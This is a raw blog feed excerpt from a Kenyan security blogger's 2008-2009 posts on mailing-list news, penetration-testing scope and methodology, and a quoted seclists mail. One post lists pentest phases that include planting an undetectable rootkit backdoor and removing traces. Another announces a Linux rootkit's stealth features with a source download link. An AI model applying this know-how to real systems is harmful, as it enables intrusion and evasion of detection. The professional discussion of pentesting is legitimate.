In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-9177188117580415772?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/9177188117580415772/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=9177188117580415772' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/9177188117580415772'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/9177188117580415772'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/05/april-heated-debatesecurity-forum-lab.html' title='April heated debate.[Security Forum] Lab Pentesting versus Real World tests'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_J9LOpyWWr2o/Sfy6a5604aI/AAAAAAAAAVU/yDWUPng-vwY/s72-c/heated_discussion.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-483513742384067396</id><published>2009-04-19T13:48:00.004+03:00</published><updated>2009-04-19T14:08:00.266+03:00</updated><title type='text'>MOVED THE SECURITY FORUM TO A NEW HOST</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_J9LOpyWWr2o/SesEEJP4utI/AAAAAAAAAVM/PFsVJM-TW60/s1600-h/secforum.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 153px;" src="http://2.bp.blogspot.com/_J9LOpyWWr2o/SesEEJP4utI/AAAAAAAAAVM/PFsVJM-TW60/s400/secforum.png" alt="" id="BLOGGER_PHOTO_ID_5326355453544282834" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Hi guys, we have moved the First Kenya Information Security Forum to a new host, maintained by penguin labs.&lt;br /&gt;&lt;br /&gt;For more info, check this out, http://lists.my.co.ke/pipermail/security/2009-April/date.html#start and to join please visit http://lists.my.co.ke/cgi-bin/mailman/listinfo/security&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-483513742384067396?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/483513742384067396/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=483513742384067396' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/483513742384067396'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/483513742384067396'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/04/moved-security-forum-to-new-host.html' title='MOVED THE SECURITY FORUM TO A NEW HOST'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_J9LOpyWWr2o/SesEEJP4utI/AAAAAAAAAVM/PFsVJM-TW60/s72-c/secforum.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-679585945046717544</id><published>2009-04-08T04:05:00.002+03:00</published><updated>2009-04-19T14:29:32.027+03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Kenyan Security Maillist'/><title type='text'>security forum is back</title><content type='html'>Morning Lions and lioness'.&lt;br /&gt;&lt;br /&gt;For the whole of last week, we have had the security forum down due to a  server crash and we lost most of the subscriptions. Been working on this  list for some hours now to make sure any member who had subscribed gets  back in as i work on my official day to night works, LOL!&lt;br /&gt;&lt;br /&gt;Anyway, hope to see some replies to this post, thank you for your  patience. This has been a good learning resource for us. Am soon going  to index the mailist on my new domain as soon as i can due to that we  need archives.&lt;br /&gt;&lt;br /&gt;If you had a member friend who tried to register last week and failed,  tell them to try it again from now. Good week and safe holidays.&lt;br /&gt;&lt;br /&gt;To register just send a black email to &lt;span style="color: rgb(204, 0, 0);"&gt;security-subscribe@openworld.co.ke&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;{EDITED} We moved to a new host, check http://lists.my.co.ke/cgi-bin/mailman/listinfo/security&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-679585945046717544?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/679585945046717544/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=679585945046717544' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/679585945046717544'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/679585945046717544'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/04/security-forum-is-back.html' title='security forum is back'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-5259799720752324599</id><published>2009-03-30T15:16:00.001+03:00</published><updated>2009-03-30T16:16:41.657+03:00</updated><title type='text'>research site down</title><content type='html'>For those trying to reach www.kamongo.co.ke, please just try it through the IP, http://41.206.42.174/ since my domain is down, until further notice.&lt;br /&gt;&lt;br /&gt;./Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-5259799720752324599?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/5259799720752324599/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=5259799720752324599' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/5259799720752324599'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/5259799720752324599'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/03/research-site-down.html' title='research site down'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-134462662970013641</id><published>2009-02-27T00:35:00.002+03:00</published><updated>2009-02-27T00:45:17.070+03:00</updated><title type='text'>insecure webapps</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_J9LOpyWWr2o/SacNKTCXTxI/AAAAAAAAAU8/akWo6Mnh7b4/s1600-h/home7.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 400px; height: 356px;" src="http://2.bp.blogspot.com/_J9LOpyWWr2o/SacNKTCXTxI/AAAAAAAAAU8/akWo6Mnh7b4/s400/home7.png" alt="" id="BLOGGER_PHOTO_ID_5307225156439461650" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;We had this discussion that a certain server was certainly so secure, and the owners stated that 10 million was used to setup the portal. Out of curiosity, a research pentest was done on this portal. To download the paper, http://www.kamongo.co.ke/chuksjonia/info/home_insecurity/TheHomecoke.pdf&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-134462662970013641?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/134462662970013641/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=134462662970013641' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/134462662970013641'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/134462662970013641'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/02/insecure-webapps.html' title='insecure webapps'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_J9LOpyWWr2o/SacNKTCXTxI/AAAAAAAAAU8/akWo6Mnh7b4/s72-c/home7.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-3520277522106512309</id><published>2009-02-03T19:14:00.002+03:00</published><updated>2009-02-03T19:18:18.531+03:00</updated><title type='text'>Some of The Conference Docs</title><content type='html'>Hey good people. Some of the conferences i have done previously, presentations are hosted in this site(www.kamongo.co.ke/chuksjonia/info). You can download for references at your own time.&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-3520277522106512309?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/3520277522106512309/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=3520277522106512309' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3520277522106512309'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3520277522106512309'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/02/some-of-conference-docs.html' title='Some of The Conference Docs'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-4181414236067433649</id><published>2009-01-27T19:53:00.002+03:00</published><updated>2009-01-27T19:57:36.251+03:00</updated><title type='text'>A perfect pentest example</title><content type='html'>1. Information Gathering Phase (find the company's website,&lt;br /&gt;     emails, employees (and their blogs etc) and anything else related)&lt;br /&gt;2. Network Discovery Phase (find the internal and external&lt;br /&gt;    network(s) of the company if possible, with help from the&lt;br /&gt;     information above)&lt;br /&gt;3. Service Discovery Phase (find all services belonging to the&lt;br /&gt;     company thus the versions, ftp, http and so on.)&lt;br /&gt;4. Vulnerability Match Phase (see if it is possible to find any&lt;br /&gt;     holes directly in the applications.)&lt;br /&gt;5. HTTP-Vulnerability Phase (check out all http-services belonging&lt;br /&gt;     to the company, check for everything ranging from SQL injection to&lt;br /&gt;     XSS)&lt;br /&gt;6. Gaining Access (see if it is possible to gain full or partially&lt;br /&gt;     access to their systems. Social Engineering might work.)&lt;br /&gt;7. Escalation of Privileges (if partial access was gained,&lt;br /&gt;     escalate privileges in order to gain root.)&lt;br /&gt;8. System/Network Browsing (find other nodes on the network if&lt;br /&gt;     possible, if so begin from service discovery phase or information&lt;br /&gt;     gathering phase.)&lt;br /&gt;9. Gaining Internal Access (if it was possible to gain internal&lt;br /&gt;     access, then the job is almost done. If not, we will need to do it&lt;br /&gt;     here. This could be achieved with XSS, Trojans, Eavesdropping,&lt;br /&gt;     Phishing or by Cracking the wireless network if they have such.&lt;br /&gt;     Even Social Engineering can work in this phase))&lt;br /&gt;10. Backdooring Phase (put a rootkit or w/e i like, as long as it&lt;br /&gt;     isn't detectable. This isn't necessary for most companies.)&lt;br /&gt;11. Removal of Traces (if needed, then remove all traces possible.)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;All they best&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-4181414236067433649?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/4181414236067433649/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=4181414236067433649' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4181414236067433649'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/4181414236067433649'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2009/01/perfect-pentest-example.html' title='A perfect pentest example'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-9029661173161020559</id><published>2008-09-04T13:11:00.003+03:00</published><updated>2008-09-04T13:20:30.331+03:00</updated><title type='text'>Ummunities' DR Linux Rootkit released</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_J9LOpyWWr2o/SL-1-GsnrNI/AAAAAAAAAMg/-89NPpyBVtI/s1600-h/canvas.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 370px; height: 232px;" src="http://1.bp.blogspot.com/_J9LOpyWWr2o/SL-1-GsnrNI/AAAAAAAAAMg/-89NPpyBVtI/s200/canvas.png" alt="" id="BLOGGER_PHOTO_ID_5242108569836825810" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Hi guys.&lt;br /&gt;&lt;br /&gt;Canvas folks just released Dr Linux rootkit with nice stealth creation, eg&lt;br /&gt;&lt;br /&gt;a) Hide processes&lt;br /&gt;b) Hide network sockets&lt;br /&gt;c) Hide files&lt;br /&gt;d) Get a remote MOSDEF Node (via hidden userland-backdoor)&lt;br /&gt;&lt;br /&gt;All of this happening to the end user.&lt;br /&gt;&lt;br /&gt;Download link: http://www.immunityinc.com/downloads/linux_rootkit_source.tbz2&lt;br /&gt;&lt;br /&gt;wget.......&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-9029661173161020559?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/9029661173161020559/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=9029661173161020559' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/9029661173161020559'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/9029661173161020559'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2008/09/ummunities-dr-linux-rootkit-released.html' title='Ummunities&apos; DR Linux Rootkit released'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_J9LOpyWWr2o/SL-1-GsnrNI/AAAAAAAAAMg/-89NPpyBVtI/s72-c/canvas.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-2844841025481522868</id><published>2008-08-22T20:39:00.003+03:00</published><updated>2008-08-22T20:48:11.479+03:00</updated><title type='text'>SECURITY DEPARTMENTS</title><content type='html'>Breaches are always good for companies' networks and systems (they make you wake up), but failure comes when you don't have a security department which should look into this, especially an Incident Response Team. Does the Kenya Police have that?&lt;br /&gt;&lt;br /&gt;These security teams should be very interested in Security and they need to be people who have Hacking experience before and do continue trying to bypass security, coz its in their blood. These guys will never ignore a breach.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Protection &lt;/span&gt;is a cost, &lt;span style="font-weight: bold;"&gt;discovery &lt;/span&gt;is another cost and &lt;span style="font-weight: bold;"&gt;remediation&lt;/span&gt; is another expensive cost.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-2844841025481522868?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/2844841025481522868/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=2844841025481522868' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/2844841025481522868'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/2844841025481522868'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2008/08/security-departments.html' title='SECURITY DEPARTMENTS'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-7550642959492884022</id><published>2008-07-14T22:19:00.003+03:00</published><updated>2008-07-14T22:54:10.521+03:00</updated><title type='text'>Scope (Pentest)</title><content type='html'>I been doing alot of pentest lately, and alot of them involved Banks and Mobile Network Providers here in Kenya. What amazed me is that some of the admins knew about scanning system and they thought that was enough. You just lauch Nessus, or Nmap like E and Y guys do, and you write up that the pentest is over, maybe after 3 days. Nooooooo, its doesn't run like that brothers.&lt;br /&gt;&lt;br /&gt;After u find the vulnerability, you need to tactically exploit the host, and bypass the IDS signatures, penetrate through to secure networks, crack passwords and even access files that are restricted. How you do it, the duration, every step depends on the ROE and the scope of the pentest as discussed. You may have found some XSS holes and the next day as you get in and get down with your gear, you find that, its just got patched, and the other pages are behind the login page.&lt;br /&gt;&lt;br /&gt;One thing you need to stress to the administration is that, the scanners wont see beyond, like an exploitation phase should.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-7550642959492884022?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/7550642959492884022/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=7550642959492884022' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7550642959492884022'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/7550642959492884022'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2008/07/scope-pentest.html' title='Scope (Pentest)'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-3936492238848365430</id><published>2008-07-14T22:11:00.001+03:00</published><updated>2008-07-14T22:15:09.873+03:00</updated><title type='text'>Valzsmith post on seclist</title><content type='html'>Hey, not posted for a while.&lt;br /&gt;&lt;br /&gt;This is a mail Valzsmith, one of the creators of BackTrack , wrote.&lt;br /&gt;&lt;br /&gt;&lt;address class="headers"&gt; &lt;span id="from"&gt; &lt;dfn&gt;From&lt;/dfn&gt;: val smith &lt;&lt;a href="mailto:valsmith_at_offensivecomputing.net?Subject=Re:%20%20Two%20thoughts%20for%20the%20day:"&gt;valsmith_at_offensivecomputing.net&lt;/a&gt;&gt; &lt;/span&gt;&lt;br /&gt;&lt;span id="date"&gt;&lt;dfn&gt;Date&lt;/dfn&gt;: Fri, 25 Apr 2008 11:09:39 -0600&lt;/span&gt;&lt;br /&gt;&lt;/address&gt; &lt;p&gt; I'll have to be honest, I don't really WANT Microsoft to change their&lt;br /&gt;patch methodology, even if the dramatic (probably incorrect)&lt;br /&gt;conclusions people seem to be drawing from this paper are true. Bear&lt;br /&gt;with me for a moment and Ill explain why. Lets be honest here, there&lt;br /&gt;are researchers (many on this list) who can rapidly find and exploit&lt;br /&gt;vulnerabilities. Patches help speed things up but BinDiff (and&lt;br /&gt;similar) things have been available for many years and the people who&lt;br /&gt;can write exploits understand this process and those with a financial&lt;br /&gt;stake in it have automated much of the process by now. If patches were&lt;br /&gt;to be obfuscated, or the process changed how long would it really take&lt;br /&gt;for someone to circumvent it? A binary has to exist somewhere at some&lt;br /&gt;point right? Someone smart enough will eventually send input to it, or&lt;br /&gt;reverse it or accidentally crash it eventually.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Many of us make use of exploits and vulnerabilities in some way for a&lt;br /&gt;living whether we are pen testers, IDS sig developers, vuln&lt;br /&gt;researchers, framework builders or whatever. At this point security is&lt;br /&gt;such a tangled, many layered labyrinth that I no longer possess the&lt;br /&gt;self righteous fury required to shout from the pulpit: "Patch your&lt;br /&gt;systems! Configure security! Use an IDS! Educate your users!"&lt;br /&gt;&lt;/p&gt;&lt;p&gt;I'm in it for the fun.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;There I said it. If everyone did everything securely, I wouldn't have&lt;br /&gt;much to do and I'd have to pour coffees or flip burgers for a living.&lt;br /&gt;I like showing up for a pen test and finding unpatched boxes, or users&lt;br /&gt;sharing admin passwords. I love finding web apps with null byte file&lt;br /&gt;inclusion bugs, or passwordless ssh keys with sudo permissions on&lt;br /&gt;every server. Its FUN. I suspect other security researchers have&lt;br /&gt;reached this conclusion (even if they haven't admitted it to&lt;br /&gt;themselves yet) that security is probably too hard a problem to&lt;br /&gt;"solve" and all our ranting really doesn't make anyone more secure in&lt;br /&gt;the long run. At this point, broken things are fun and we just want to&lt;br /&gt;play and thankfully people are willing to pay for it.  I don't mind if&lt;br /&gt;you continuously make it just a little bit harder, just to keep it&lt;br /&gt;interesting,  but don't take away my exploits please! ;)&lt;br /&gt;&lt;/p&gt;V.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Its said like it is.&lt;br /&gt;&lt;br /&gt;/Chuks&lt;div class="blogger-post-footer"&gt;The information within this paper may change without notice. 
Use of this information constitutes acceptance for use in an AS IS condition. 
There are NO warranties with regard to this information. 
In no event shall the author be liable for any damages whatsoever arising 
out of or in connection with the use or spread of this information. 
Any use of this information is at the user's own risk. 
The information is for educational use only.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6760447586854804036-3936492238848365430?l=chuksjonia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://chuksjonia.blogspot.com/feeds/3936492238848365430/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6760447586854804036&amp;postID=3936492238848365430' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3936492238848365430'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6760447586854804036/posts/default/3936492238848365430'/><link rel='alternate' type='text/html' href='http://chuksjonia.blogspot.com/2008/07/valzsmith-post-on-seclist.html' title='Valzsmith post on seclist'/><author><name>chuksjonia</name><uri>http://www.blogger.com/profile/12265538270706464560</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='21' src='http://4.bp.blogspot.com/_J9LOpyWWr2o/SQYwU-cIFpI/AAAAAAAAAOI/t7DKi1ashdQ/S220/mr+veddatta.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6760447586854804036.post-7329425886608214922</id><published>2008-06-03T14:25:00.001+03:00</published><updated>2008-06-03T14:29:39.216+03:00</updated><title type='text'>Penetration testing</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_J9LOpyWWr2o/SEUqw3zvL_I/AAAAAAAAALo/9flvxodu8H4/s1600-h/computer_room.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://bp1.blogger.com/_J9LOpyWWr2o/SEUqw3zvL_I/AAAAAAAAALo/9flvxodu8H4/s200/computer_room.jpg" alt="" 